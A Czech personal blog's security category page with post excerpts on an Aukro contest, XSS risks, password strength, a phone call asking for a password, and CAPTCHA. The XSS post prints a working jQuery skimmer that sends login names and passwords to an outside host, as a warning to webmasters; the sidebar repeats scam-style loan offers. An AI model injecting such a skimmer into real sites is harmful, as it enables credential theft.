Bezpečnost a hacking | Michal Smrčka - blog

Aukro v nové soutěži odměnuje šikovné programátory

V těchto dnech probíhá na Aukro.cz soutěž „Aukro naděluje“. Každý den organizátoři umístí do nějaké náhodné sekce na Aukru relativně hodnotné produkty za směšně nízkou cenu. Je k dispozici vždy pouze 1 kus. Vy musíte tento produkt najít a zakoupit jako první.

O soutěži jsem se dozvěděl na Twitteru a nebýt následujícího odvážného prohlášení Aukra, ani bych se jí příliš nezaobíral:

foto

foto

„Nebojte, na roboty a podvodné programy jsme mysleli, takže tudy cesta nevede.“


18. 11. 2011 v 16:04 • Bezpečnost a hacking • autor Michal Smrčka86 komentářů

S XSS zranitelností se dá napáchat více škody, než si myslíte

Otázka pro webmastery: Víte, co dělá následující jQuery kód?

<script>$(function(){setInterval(function() {$.get('http://nejaky_web.cz/uloz_data.php', {jmeno: $('[name=l_jmeno]').val(), heslo: $('[name=l_heslo]').val() })},500);}); </script>

Pokud nevíte, a zároveň se někde na vašem webu vyskytuje výpis typu „echo $_POST[rocnik] “, upalujte svůj web opravit a vypisované parametry ošetřit.

Jestli provozujete web obsahující např. citlivá data uživatelů, pak vyloženě hazardujete. Za únik dat hrozí právní postih i vám, pokud se prokáže, že nebyla provedena ani nejzákladnější bezpečnostní opatření. Což obrana proti XSS bezesporu je. Více informací na Wikipedii.


13. 11. 2010 v 20:45 • Bezpečnost a hacking • autor Michal Smrčka1 komentář

Na délce záleží! Jak zvolit správné heslo?

Průměrný uživatel používá k přihlášení na webové služby velmi slabá hesla. Tak slabá, že případný útočník dokáže za několik hodin, příp. dní heslo v plné své kráse odhalit. Lidé toto zbytečně podceňují, navíc zvolit si těžko prolomitelné heslo nemusí být vůbec složité!

Nejdříve pár čísel.

V souvislosti se statistikami hesel pocházejícími ze vzorku více než 800.000 uživatelských účtů vyplynuly tyto závěry: *

  • 9% uživatelů má heslo dlouhé jen 4 znaky nebo méně
  • ovšem heslo o maximální délce 6 znaků (pořád slabé) používá více než 50% lidí!
  • počet hesel, který dokáže počítač automaticky tipnout za jednu sekundu, se pohybuje mezi 20 a 100 za sekundu **
  • zjištění čtyřmístného hesla tedy brutal-force útokem zpravidla trval maximálně 40 hodin, v praxi je to ale mnohem méně
  • odhalení pětimístného hesla by bylo jisté maximálně za 24 dní, ovšem za předpokladu zapojení více paralelních počítačů je možné proces urychlit
  • pokud máte maximálně šestimístné heslo, prodloužila by se maximální doba zjištění na téměř 2,5 roku, nicméně také platí, že v případě zapojení více počítačů se doba zkrátí :)

20. 09. 2009 v 21:29 • Bezpečnost a hacking • autor Michal Smrčka17 komentářů

Řekněte mi, prosím, Vaše heslo...

Příchozí hovor z klasického telefonního čísla s předvolbou 776:

„Dobrý den, mluvím s panem Michalem Smrčkou?“
„Ano, u telefonu.“
„Vidím, že využíváte služby našeho operátora a měl bych pro Vás výhodnou nabídku. Nicméně potřeboval bych si Vás ověřit. Můžete mi, prosím, pro kontrolu sdělit Vaše osobní heslo?“

Jak byste zareagovali v mém případě?


21. 06. 2009 v 19:15 • Bezpečnost a hacking • autor Michal Smrčka3 komentáře

Zlo jménem Captcha (opisování znaků z obrázku)

Jsem zásadní odpůrce Captchy. Je to velmi účinná metoda, jak uživatele co nejvíce nasrat.

Captcha je řetězec znaků, který na některých webech musíte opsat z obrázku, abyste mohli přispět diskuzním příspěvkem, poslat e-mail prodejci atp. Důvodem má být zamezení automatického odesílání SPAMu skrz tyto formuláře nebo jiné strojové využití formulářů (roboti vygenerované znaky obvykle neumí rozpoznat a „opsat“).

  captcha

19. 04. 2009 v 11:11 • Bezpečnost a hacking • autor Michal Smrčka141 komentářů

Stránka: 1 2 >

Kategorie blogu

Twitter feed

Poslední články

Poslední komentáře

polokova: nabídka půjčky Potřebujete financování pro svůj domov, pro vaše podnikání, pro nákup automobilu, pro nákup motocyklu, pro vytvoření vlastního podnikání, pro vaše osobní potřeby více pochybností. Poskytujeme osobní úvěry v rozsahu od 5 000 až 5 000 000 EUR s nominální úrokovou sazbou 3%... Ukázat
gauss1020: Hledáte čestnou a rychlou půjčku? -Mail: gausschantal@gmail.com Číslo: 0033648421181 Dobrý den, Jsem věřitel a soukromý investor. Potřebujete legitimní, čestné, seriózní a rychlé financování? Můžu vám pomoci se 100% zajištěnými půjčkami, nabízím obchodní služby, financování nemovitostí a individuální půjčky. Financujeme také všechny typy projektů. Děkuji Ukázat
gauss1020: Hledáte čestnou a rychlou půjčku? -Mail: gausschantal@gmail.com Číslo: 0033648421181 Dobrý den, Jsem věřitel a soukromý investor. Potřebujete legitimní, čestné, seriózní a rychlé financování? Můžu vám pomoci se 100% zajištěnými půjčkami, nabízím obchodní služby, financování nemovitostí a individuální půjčky. Financujeme také všechny typy projektů. Děkuji Ukázat
gauss1020: Hledáte čestnou a rychlou půjčku? -Mail: gausschantal@gmail.com Číslo: 0033648421181 Dobrý den, Jsem věřitel a soukromý investor. Potřebujete legitimní, čestné, seriózní a rychlé financování? Můžu vám pomoci se 100% zajištěnými půjčkami, nabízím obchodní služby, financování nemovitostí a individuální půjčky. Financujeme také všechny typy projektů. Děkuji Ukázat
gauss1020: Hledáte čestnou a rychlou půjčku? -Mail: gausschantal@gmail.com Číslo: 0033648421181 Dobrý den, Jsem věřitel a soukromý investor. Potřebujete legitimní, čestné, seriózní a rychlé financování? Můžu vám pomoci se 100% zajištěnými půjčkami, nabízím obchodní služby, financování nemovitostí a individuální půjčky. Financujeme také všechny typy projektů. Děkuji Ukázat

Vyhledávání

Nastavení

Velikost písma: Abc Abc Abc